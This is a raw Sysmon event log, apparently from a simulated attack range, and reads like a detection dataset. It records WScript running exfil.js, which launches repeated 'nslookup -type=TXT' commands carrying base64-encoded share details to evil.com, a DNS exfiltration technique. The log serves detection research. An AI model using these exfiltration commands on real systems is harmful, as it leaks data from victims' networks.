2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.712{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbowvt.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.696{2E1864BB-18E9-629A-5B43-000000005F02}21048100C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5C43-000000005F02}2260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.680{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.680{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.680{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.680{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.680{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5C43-000000005F02}2260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.680{2E1864BB-18E9-629A-5A43-000000005F02}76644484C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-5C43-000000005F02}2260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.692{2E1864BB-18E9-629A-5C43-000000005F02}2260C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-5A43-000000005F02}7664C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbowvt.tmp 2>&1 10341000x8000000000000000208256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.677{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5B43-000000005F02}2104C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.677{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5B43-000000005F02}2104C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.659{2E1864BB-18E9-629A-5B43-000000005F02}21048100C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5A43-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.659{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5B43-000000005F02}2104C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.643{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.643{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5A43-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.643{2E1864BB-18E0-629A-6742-000000005F02}39765352C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-5A43-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.657{2E1864BB-18E9-629A-5A43-000000005F02}7664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbowvt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000208245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.276{00000000-0000-0000-0000-000000000000}7960<unknown process>-udptruefalse127.0.0.1-50575-false127.0.0.1-53domain 354300x8000000000000000208244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.276{00000000-0000-0000-0000-000000000000}7960<unknown process>-udpfalsefalse127.0.0.1-50574-false127.0.0.1-53domain 354300x8000000000000000208243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.276{00000000-0000-0000-0000-000000000000}7960<unknown process>-udptruefalse127.0.0.1-50574-false127.0.0.1-53domain 354300x8000000000000000208242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.275{00000000-0000-0000-0000-000000000000}7960<unknown process>-udpfalsefalse127.0.0.1-50573-false127.0.0.1-53domain 354300x8000000000000000208241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.275{00000000-0000-0000-0000-000000000000}7960<unknown process>-udptruefalse127.0.0.1-50573-false127.0.0.1-53domain 23542300x8000000000000000208240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.643{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlktiq.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.627{2E1864BB-18E9-629A-5843-000000005F02}76321144C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5943-000000005F02}4596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.627{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.627{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.627{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.627{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.627{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5943-000000005F02}4596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.627{2E1864BB-18E9-629A-5743-000000005F02}68243968C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-5943-000000005F02}4596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.631{2E1864BB-18E9-629A-5943-000000005F02}4596C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-5743-000000005F02}6824C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlktiq.tmp 2>&1 10341000x8000000000000000208231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.596{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5843-000000005F02}7632C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 